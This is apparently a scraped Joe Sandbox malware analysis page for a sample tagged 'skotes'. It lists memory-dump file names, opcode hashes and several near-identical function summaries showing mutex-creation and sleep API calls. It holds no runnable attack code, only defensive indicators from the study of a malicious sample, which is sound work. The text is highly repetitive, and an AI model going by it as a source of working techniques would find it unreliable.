Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2.
API String ID: 396266464-2773616320
Opcode ID: 49cbeae0303ac77e7e296d5f54842fb499066ca57c33a265d6b1f3a41ffef430
Instruction ID: ced50b82337a70034d370895902955f7bbde8dd2f56d88d0367fcb205f6bde0d
Opcode Fuzzy Hash: 49cbeae0303ac77e7e296d5f54842fb499066ca57c33a265d6b1f3a41ffef430
Instruction Fuzzy Hash: E93199317291048BFB0CEB78DCC87ACB766EF91314F24421AE014DB7C1CB7599A08712

Function 0028A079 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0028A07C
Sleep.KERNEL32(00000064,?), ref: 0028A963
CreateMutexA.KERNEL32(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2.
API String ID: 396266464-2773616320
Opcode ID: bb1f661a4409877a234635ccc268d87cdd0a06044281b032936a76792bfa3e2d
Instruction ID: b132bacbb16b272737f82236471a27bd93e34d793294b9ca2d3ec1b021ebbffb
Opcode Fuzzy Hash: bb1f661a4409877a234635ccc268d87cdd0a06044281b032936a76792bfa3e2d
Instruction Fuzzy Hash: 683159317291049BFB08EBB8DDC9B6DB766EF91314F24421AE019973D1CF7699A08713

Function 0028A1AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0028A1B1
Sleep.KERNEL32(00000064,?), ref: 0028A963
CreateMutexA.KERNEL32(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2.
API String ID: 396266464-2773616320
Opcode ID: 9daa3db3b12b6f525b26d81d0a42e698093e43b9afe35590104bfc3272a5ea76
Instruction ID: 9d8ad159e5921b126f0605c1b4998e1346986284cd34eef82799f86262902ddb
Opcode Fuzzy Hash: 9daa3db3b12b6f525b26d81d0a42e698093e43b9afe35590104bfc3272a5ea76
Instruction Fuzzy Hash: D7318831B291009BFB18EBB8DDCCB6CB766AF86314F24421AE404972D4CF7699A08712

Function 0028A2E3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 134sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0028A2E6
Sleep.KERNEL32(00000064,?), ref: 0028A963
CreateMutexA.KERNEL32(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2.
API String ID: 396266464-2773616320
Opcode ID: f0e26ea2c52fc9bcb3ea73b70e1e55ec20fb40afa1ca03084503cb2ad4a62f83
Instruction ID: b372957950f92985a607a137addf6df866b66588fb37843251330d69095dd324
Opcode Fuzzy Hash: f0e26ea2c52fc9bcb3ea73b70e1e55ec20fb40afa1ca03084503cb2ad4a62f83
Instruction Fuzzy Hash: BA319B317292049BFB18EB78DCC876CB776EF91318F24421AE415977D4CF7599A08712

Function 0028A418 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0028A41B
Sleep.KERNEL32(00000064,?), ref: 0028A963
CreateMutexA.KERNEL32(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2.
API String ID: 396266464-2773616320
Opcode ID: eaeb512cd8f39e4ce94adf2831980922bd775c6fe28264d3d85a5d24a71700d3
Instruction ID: 28d9d879210e9d9aa603a2b66e3baa9351f2a235ab1a6c9a2dce324b3c8265c6
Opcode Fuzzy Hash: eaeb512cd8f39e4ce94adf2831980922bd775c6fe28264d3d85a5d24a71700d3
Instruction Fuzzy Hash: B7316A31B291049BFF08EBB8D9CDB6DB766EF81314F24421AE0159B2C5CFB559A08B12

Function 0028A54D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0028A550
Sleep.KERNEL32(00000064,?), ref: 0028A963
CreateMutexA.KERNEL32(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2.
API String ID: 396266464-2773616320
Opcode ID: ba8a70d3eab576b4708612412607f14419367abc64fc3888fd23bd02e9a87633
Instruction ID: 0a0a8af3fa1c6e36e16230d7791240b709a14356d7d485a6d63ade1db42d4f14
Opcode Fuzzy Hash: ba8a70d3eab576b4708612412607f14419367abc64fc3888fd23bd02e9a87633
Instruction Fuzzy Hash: 87316E31B261049BFB08EB78DDC976CB765EF81318F24821AE015972D5CF7999A08712

Function 0028A682 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0028A685
Sleep.KERNEL32(00000064,?), ref: 0028A963
CreateMutexA.KERNEL32(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2.
API String ID: 396266464-2773616320
